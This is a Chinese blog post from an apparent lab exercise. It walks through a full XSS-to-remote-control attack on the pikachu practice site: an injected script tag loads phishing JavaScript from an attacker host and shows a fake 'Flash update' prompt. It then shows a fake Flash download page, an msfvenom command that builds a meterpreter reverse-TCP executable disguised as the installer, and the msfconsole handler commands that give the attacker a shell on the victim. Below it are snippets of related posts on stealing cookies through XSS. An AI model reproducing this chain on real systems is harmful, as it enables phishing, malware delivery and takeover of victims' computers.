xss-flash攻击钓到 wins电脑权限

已于 2025-03-06 00:37:06 修改
阅读量469 收藏 3
点赞数 16
CC 4.0 BY-SA版权
分类专栏: 个人分析总结 文章标签: xss 前端
于 2025-03-06 00:33:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_65379983/article/details/146052671

1. 打开XSS网站:https://xssaq.com,

注册登录。点击公共模块,选择FLASH弹窗钓鱼。

 2.  复制js代码,

并保存在apache的网站根目录下,保存为js文件。

3. 以pikachu后台管理员作为攻击对象,

从xss漏洞关卡,输入代码:引用外部的js文件

攻击者,输入代码:<script src="http://192.168.182.131/1.js"></script>

4.  刷新后台管理界面,显示钓鱼信息。

5. 当管理员点击“立即升级”,下载“病毒”flash可执行文件。

5.1   为了更加真实,

将1.js文件内容:可执行exe文件地址和名称改为:ip/flash.exe。

5.2  修改文件后,

在数据库的xssblind表中删除所有记录,并将js文件再次通过xss漏洞发送给后台。

<script src="http://192.168.182.131/1.js"></script>

5.3 搭建一个假的flash网页

,将下载的包解压,放在网站根目录下。

5.4 在1.js文件中,

将受害者点击下载的文件名改为真的flash执行文件的名称。

5.5 打开kali,制作病毒。

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.182.145  LPORT=3366 -f exe > shell.exe

5.6  病毒修改为  真正的exe的文件名称。

5.7  刷新admin页面,

弹出钓鱼弹窗。当管理员认为需要升级时,点击“立即升级”。点击“保存”。

如果通过ip访问,可跳转到假网站,点击下载,效果相同。因为该网站页面与病毒执行文件在网站根目录的同一级内。

5.8  可以看到下载下来的是我们伪装成执行程序的病毒。

6.  在kali先进行监听操作

msfconsole  //依次执行代码
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.182.145          //注意和生成病毒时一致
set lport 3366
run

7. 当受害者双击运行可执行程序时,kali攻击者可监测到。

输入shell命令,即可执行命令。

8.输入命令:mstsc      被控制目标执行相同命令

通关xss-flash钓鱼,获取目标的操作权限,基本演示结束。  

拜拜。

XSS漏洞学习
Wawyw's Blog
03-18 853
XSS练习靶场 在线: https://xss.haozi.me/ https://xssaq.com/yx/index.php 需下载安装: DVWA pikachu 1、XSS 跨站脚本(Cross-site Scripting )攻击攻击者通过网站注入点注入客户端可执行解析的payload(脚本代码),当用户访问网页时,恶意payload自动加载并执行,以达到攻击者目的(窃取cookie、恶意传播、钓鱼欺骗等)。 为了避免CSS(层叠样式表)相混淆,通常称它为"XSS""。形成XSS漏洞的主要原.
XSS基础总结
moRickyer的博客
11-21 2700
在网上找了很多文章,由于自己能力不够只总结了这些,相关靶场的没有整理,网上的资料很好,就没有整理。 靶场 https://xssaq.com/yx/index.php dvwa Dorabox
XSS攻击平台,攻击pikachu
ineedmoreMuQ的博客
07-23 350
XSS攻击平台,攻击pikachu
CSRF xss平台获得cookie
weixin_48266255的博客
08-10 504
CSRF xss平台获得cookie。
xss平台获取管理员cookie
weixin_53198216的博客
07-23 484
在我的项⽬中选择我们刚创建的项⽬,点击左上角的查看配置代码。模拟管理员登录后台的操作 登录完成后触发我们插⼊的恶意代码。5.打开pikachu平台输入这条代码进行提交。此时回到平台上可看到其劫持的Cookie信息。点击查看 可以查看到其中的cookie字段。1.进入xss平台进行注册登录。4.复制script这一条代码。
xss-labs-master.rar
05-09
"xss-labs-master.rar" 提供了一个针对XSS漏洞的专项练习平台,旨在帮助初学者及安全爱好者提升对XSS攻击的理解和防御能力。这个靶机资源共分为二十个关卡,由浅入深,逐步引导用户掌握XSS攻防的核心技巧。 一、XSS...
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
`xss-labs-master`是一个深入理解和实践XSS注入的绝佳平台,它涵盖了多种XSS类型和攻击方式,通过实战提升安全测试人员的技能。在解决每个挑战的过程中,参与者不仅可以掌握如何识别和利用XSS漏洞,还能学习如何有效...
xss-labs-master源码
07-06
"xss-labs-master"是一个专门设计的靶场,包含了20个级别的XSS练习,旨在帮助学习者深入理解和掌握XSS攻击的原理、类型以及防御策略。通过逐步解决这些精心设计的挑战,我们可以逐步提升对XSS攻击的理解,并提升安全...
WEB渗透学习-XSS-labs靶场
04-20
**XSS(跨站脚本攻击)学习指南:XSS-labs靶场详解** XSS,全称为Cross-Site Scripting,是网络安全领域常见的漏洞类型之一。它允许攻击者通过注入恶意脚本到Web页面中,进而对用户浏览器进行操控。XSS-labs是一个...
xss-labs.zip
06-25
"xss-labs.zip" 提供了一个专为学习和实践XSS攻击设计的集成环境,它通过一系列的挑战关卡,帮助我们了解和掌握XSS攻击的原理和防范措施。 XSS攻击主要分为三类:存储型XSS、反射型XSS和DOM-Based XSS。在"XSS Labs...
跨站脚本攻击XSS
秋水的博客
09-04 3726
xss原理 什么是xss? 个人理解:xss全称跨站脚本攻击,也是一种注入,可以叫HTML注入,而注入的本质是什么,就是用户输入的数据可以被当作代码来执行。 与SQL注入一样,xss的条件也是两个: 第一,参数可控 第二,输入的参数可以被拼接到源代码中执行 那么,xss需要我偶们拼接什么呢? SQL注入拼接的是操作数据库的SQL语句。XSS拼接的是网页的HTML代码,一般而言我们是...
xss平台获取管理员cookie 相关步骤
weixin_57682301的博客
07-23 390
打开⼀个pikachu平台 xss盲打并将我们刚才复制的script恶意代码输⼊进去。在我的项⽬中选择我们刚创建的项⽬点击右上角查看配置代码 进入复制script这一条。在以下网站注册账号并登录,点击创建项目并填写名称--立即提交。模拟管理员登录后台的操作 登录完成后触发我们插⼊的恶意代码。此时回到平台上可看到其劫持的Cookie信息。点击查看 可以查看到其中的cookie字段。
利用xss获取管理员用户名密码
最新发布
qq_64470109的博客
03-05 272
打开⼀个pikachu平台 xss盲打并将我们刚才复制的script恶意代码输⼊进去。7、回到我们的xss平台,刷新,查看,就可以得到刚刚我们模拟管理员的用户名和密码了。3、点击立即提交后在我们的项目模块里找到自己的项目,点击右上角的查看配置代码,1、在网站https://xssaq.com注册账号,并登录。2、在项目操作模块点击创建项目,并输入项目名称。5、模拟管理员,登录后台地址。复制script这⼀条代码。6、输入用户名和密码。
xss平台获取管理员cookie xss flash钓鱼拿到主机控制权
weixin_71053667的博客
07-23 545
点击"设置"--"解压后运行"如下两行内容...并在"模式"标签下设置"全部隐藏" 配置更新方式----解压并更新文件而覆盖方式----覆盖所有文件。5.将两个文件一块压缩并更改文件名为"flashcenter_pp_ax_install_cn.exe",点击"高级"标签页下的"自解压选项"填。3.来到xss平台 点击公共模块---flash弹窗钓鱼-查看 将其中的代码保存成一个js文件放到我们网站的根目录下面。4.模拟管理员登录后台的操作 登录完成后触发我们插入的恶意代码。# Flash官网下载。
XSS-窃取Cookie和Flash攻击钓⻥
weixin_53736204的博客
07-23 582
步骤⼀:在以下⽹站注册账号并登陆,点击"创建项⽬"并填写项⽬名称…⽴即提交步骤⼆:在我的项⽬中选择我们刚创建的项⽬步骤三:点击右上⻆的查看配置代码步骤四:复制script这⼀条代码步骤五:打开⼀个pikachu平台 xss盲打并将我们刚才复制的script恶意代码输⼊进去步骤六:模拟管理员登录后台的操作 登录完成后触发我们插⼊的恶意代码用户名:admin 123456步骤七:此时回到平台上可看到其劫持的Cookie信息.点击查看 可以查看到其中的cookie字段。
test.ctf8(XSS挑战之旅)解题记录
Dexret的博客
12-03 4080
xss平台网址:test.ctf8.com 过关条件:只有能够跳出完成得不错得提示框,即为过关 level1 第一关没啥好说得,入门题 payload <script>alert('abc')</script> level2 该题通过查看网页源码可以看出,该题将我们输入得内容插入到value标签中 那么我们可以通过在输入得内容前加入">去闭合value标签成功弹窗 payload "><script>alert(1)&lt..
xss-labs靶场通关payload
weixin_51339377的博客
04-18 771
地址: 欢迎来到XSS挑战 流程: 1.正常人 正常去输入即可 2.标准测试代码输入 找相应的互动点有哪些 查看网页源代码 3.寻找注入点 构造payload提交即可 ssaq.com dsds' value=javascript:alert(1) Level1 url:https://xssaq.com/yx/level1.php?name=test <h2 align=center>欢迎用户test</h2><center><..
渗透实用的工具网站 希望对你们有用,
m0_56214376的博客
03-16 3727
希望对你们有用, 以前找东西,要么记不住,要么找不到 http://dns.aizhan.com(ip翻查域名绑定) http://ping.chinaz.com/ https://www.17ce.com/ (检测是CDN) https://xssaq.com (xss平台) http://whois.chinaz.com/ (域名信息查询) http://stool.chinaz.com/same (旁站查询) https://www.webscan.cc/ ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值